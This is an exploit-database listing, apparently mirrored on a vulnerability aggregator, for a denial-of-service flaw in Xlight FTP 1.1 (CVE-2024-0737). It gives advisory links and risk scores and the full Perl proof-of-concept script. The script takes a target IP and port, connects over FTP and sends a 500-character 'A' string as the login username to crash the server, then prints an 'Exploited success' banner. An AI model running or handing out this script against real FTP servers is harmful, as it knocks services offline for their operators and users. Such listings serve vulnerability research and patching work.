Lucene search
K

Xlight FTP 1.1 - Denial Of Service (DOS)

🗓️ 28 Jul 2025 00:00:00Reported by Fernando MengaliType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 246 Views

Xlight FTP 1.1 is vulnerable to Denial Of Service attack exploiting the software on Windows XP.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-0737
19 Jan 202423:21
circl
CNNVD
Xlight FTP Security Vulnerability
19 Jan 202400:00
cnnvd
CVE
CVE-2024-0737
19 Jan 202421:31
cve
Cvelist
CVE-2024-0737 Xlightftpd Xlight FTP Server Login denial of service
19 Jan 202421:31
cvelist
EUVD
EUVD-2024-16526
3 Oct 202520:07
euvd
NVD
CVE-2024-0737
19 Jan 202422:15
nvd
OSV
CVE-2024-0737
19 Jan 202422:15
osv
Packet Storm
📄 Xlight FTP 1.1 Denial of Service
28 Jul 202500:00
packetstorm
Prion
Design/Logic Flaw
19 Jan 202422:15
prion
Positive Technologies
PT-2024-15794 · Unknown · Xlight Ftp Server
19 Jan 202400:00
ptsecurity
Rows per page
# Exploit Title: Xlight FTP 1.1 - Denial Of Service (DOS)
# Google Dork: N/A
# Date: 22 July 2025
# Exploit Author: Fernando Mengali
# LinkedIn: https://www.linkedin.com/in/fernando-mengali/
# Vendor Homepage: https://www.xlightftpd.com
# Software Link: N/A
# Version: 1.1
# Tested on: Windows XP
# CVE: CVE-2024-0737 

  $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

    my $payload = "\x41"x500;    

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print q {

	                            ,--,
	                     _ ___/ /\|
	                 ,;'( )__, )  ~
	                //  //   '--; 
	                '   \     | ^
	                     ^    ^

	    [+] LightFTP 1.1 - Denial of Service (DoS)

	    [*] Coded by Fernando Mengali

	    [@] e-mail: [email protected]

      }
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Jul 2025 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.15.3 - 7.5
CVSS 25
CVSS 35.3
EPSS0.01903
SSVC
246